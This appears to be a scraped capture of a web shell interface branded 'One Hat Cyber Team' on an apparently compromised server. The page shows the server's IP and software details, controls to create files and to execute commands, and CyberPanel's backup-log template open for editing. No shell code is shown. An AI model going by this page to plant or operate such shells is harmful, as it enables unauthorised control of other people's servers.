⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.91
Server IP:
57.129.66.90
Server:
Linux vps-7f548908 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
CyberCP
/
backup
/
templates
/
backup
/
Edit File: backupLogs.html
{% extends "baseTemplate/index.html" %} {% load i18n %} {% block title %}{% trans "Backup Logs - CyberPanel" %}{% endblock %} {% block content %} {% load static %} {% get_current_language as LANGUAGE_CODE %}
{% trans "Backup Logs" %}
{% trans "On this page you can view detailed logs of your local and remote scheduled backups." %}
{% trans "Backup Logs" %}
{% trans "Select Log File" %}
{% for items in backups %}
{{ items }}
{% endfor %}
{% trans "Successful Sites" %}
{% trans "Failed Sites" %}
{% trans "Location" %}
{$ jobSuccessSites $}
{$ jobFailedSites $}
{$ location $}
10
50
100
500
{% trans "LEVEL" %}
{% trans "Message" %}
{$ $index + 1 $}
{% endblock %}
Simpan